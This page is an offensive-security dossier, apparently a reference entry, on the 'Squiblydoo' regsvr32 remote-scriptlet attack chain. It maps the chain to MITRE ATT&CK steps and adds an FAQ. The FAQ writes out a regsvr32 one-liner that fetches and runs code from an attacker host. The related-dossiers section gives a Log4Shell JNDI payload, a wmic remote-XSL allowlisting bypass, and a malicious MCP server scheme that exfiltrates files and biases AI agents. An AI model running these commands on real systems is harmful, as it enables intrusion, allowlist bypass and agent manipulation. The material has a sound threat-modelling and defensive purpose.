Squiblydoo: regsvr32 → remote SCT execution

§ Context

Assumed environment: target enforces application allowlisting that trusts signed Microsoft binaries. End user can run regsvr32 (true on every Windows endpoint).

§ Steps

1. 01
   JS stager loads beaconExecution

   T1059— Command and Scripting Interpreter
2. 02
   Deliver one-liner to userInitial Access

   T1566— Phishing
3. 03
   Host attacker .sct on the webResource Development

   T1583— Acquire Infrastructure
4. 04
   regsvr32 fetches + runs SCTExecution

   LOL-REGSVR32— regsvr32.exe /i Scriptlet (Squiblydoo)
5. 05
   WMI event subscription persistencePersistence

   LOL-SCRCONS— scrcons.exe WMI Event Subscription

§ References

• T1059Command and Scripting Interpreter
• T1566Phishing
• T1583Acquire Infrastructure

§ Frequently asked

What is the "Squiblydoo: regsvr32 → remote SCT execution" attack path?

regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context. It chains 5 steps drawn from real-world offensive-security techniques.

What starting position does this attack require?

The first step is JS stager loads beacon (T1059) — a execution primitive. Assumed environment: target enforces application allowlisting that trusts signed Microsoft binaries.

What is the final impact of this kill-chain?

The final step lands on WMI event subscription persistence (LOL-SCRCONS), which falls under Persistence. From here, an operator typically pivots into post-exploitation or maintains persistence.

How can defenders detect or prevent this attack?

Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

§ Related dossiers

• Shared techniques2

  Malicious MCP server → silent supply chain for agent tools

  User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.

• Shared techniques2

  Log4Shell (CVE-2021-44228) → RCE → lateral

  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.

• Shared techniques2

  wmic + XSL → AppLocker / SRP bypass

  wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.

• Shared techniques2

  DNS rebinding → access internal router admin from a browser

  Victim visits attacker page. JS opens a connection to attacker.com, which after the first request flips its DNS A record to 192.168.1.1 — subsequent requests now go to the victim's router under the attacker's origin.

• Shared techniques2

  Rowhammer → bit flip → in-browser sandbox escape

  JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.

• Shared techniques2

  Permissive SPF / DMARC p=none → CEO impersonation BEC

  Target publishes SPF ~all and DMARC p=none. Send mail from attacker IP with a forged From: <ceo@target.com>; gateway delivers as-is. Combine with display-name spoof for a credible BEC.